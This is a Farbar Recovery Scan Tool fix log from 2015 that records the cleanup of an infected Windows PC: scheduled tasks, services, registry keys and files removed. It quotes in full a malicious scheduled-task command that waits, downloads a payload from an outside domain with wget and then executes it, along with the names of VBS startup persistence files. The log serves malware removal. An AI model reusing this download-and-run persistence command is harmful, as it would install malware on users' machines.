Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 12-04-2015 Ran by olila at 2015-04-14 17:09:59 Run:1 Running from H:\FRST Loaded Profiles: olila (Available profiles: olila) Boot Mode: Normal ============================================== Content of fixlist: ***************** CloseProcesses: CreateRestorePoint: Startup: C:\Users\olila\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs () Task: {8EEE3983-76EA-4F2F-8976-35675C6DC2B8} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=By1vykaB59;setup.exe;1422133484 & start cmd /R dat.bmp <==== ATTENTION Task: {FFEA7BD6-71D5-46AE-811F-D9D80A1F00D4} - System32\Tasks\{F9DC6CAF-D8FF-4391-8498-51137BA99E5A} => pcalua.exe -a "G:\! WSZYSTKIE PROGRAMY INSTALKI\Drukarki\Uninstall-sterowniki druk\brunins.exe" -d "G:\! WSZYSTKIE PROGRAMY INSTALKI\Drukarki\Uninstall-sterowniki druk" HKU\S-1-5-21-3236243999-3144956723-4226996683-1000\...\Policies\Explorer: [NoLogOff] 0 HKU\S-1-5-21-3236243999-3144956723-4226996683-1000\...\Run: [AdobeBridge] => [X] S3 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [X] S3 cpuz136; \??\C:\Users\olila\AppData\Local\Temp\cpuz136\cpuz136_x64.sys [X] S3 GPUZ; \??\C:\Windows\TEMP\GPUZ.sys [X] S3 IT9135BDA; System32\Drivers\IT9135BDA.sys [X] C:\ProgramData\dat.bmp C:\ProgramData\TEMP C:\Users\olila\AppData\Roaming\bsplayerpro.exe C:\Users\olila\AppData\Roaming\update.vbs C:\Windows\pss\update.vbs.Startup C:\Windows\SysWOW64\srvany.exe Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^olila^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^update.vbs" /f EmptyTemp: ***************** Processes closed successfully. Restore point was successfully created. C:\Users\olila\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs => Moved successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{8EEE3983-76EA-4F2F-8976-35675C6DC2B8}" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8EEE3983-76EA-4F2F-8976-35675C6DC2B8}" => Key deleted successfully. C:\Windows\System32\Tasks\SYSTEM => Moved successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SYSTEM" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FFEA7BD6-71D5-46AE-811F-D9D80A1F00D4}" => Key deleted successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FFEA7BD6-71D5-46AE-811F-D9D80A1F00D4}" => Key deleted successfully. C:\Windows\System32\Tasks\{F9DC6CAF-D8FF-4391-8498-51137BA99E5A} => Moved successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F9DC6CAF-D8FF-4391-8498-51137BA99E5A}" => Key deleted successfully. HKU\S-1-5-21-3236243999-3144956723-4226996683-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLogOff => value deleted successfully. HKU\S-1-5-21-3236243999-3144956723-4226996683-1000\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeBridge => value deleted successfully. ACDaemon => Service deleted successfully. cpuz136 => Service deleted successfully. GPUZ => Service deleted successfully. IT9135BDA => Service deleted successfully. C:\ProgramData\dat.bmp => Moved successfully. C:\ProgramData\TEMP => Moved successfully. C:\Users\olila\AppData\Roaming\bsplayerpro.exe => Moved successfully. C:\Users\olila\AppData\Roaming\update.vbs => Moved successfully. C:\Windows\pss\update.vbs.Startup => Moved successfully. C:\Windows\SysWOW64\srvany.exe => Moved successfully. ========= reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^olila^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^update.vbs" /f ========= Operacja ukoäczona pomy˜lnie. ========= End of Reg: ========= EmptyTemp: => Removed 818.1 MB temporary data. The system needed a reboot. ==== End of Fixlog 17:14:06 ====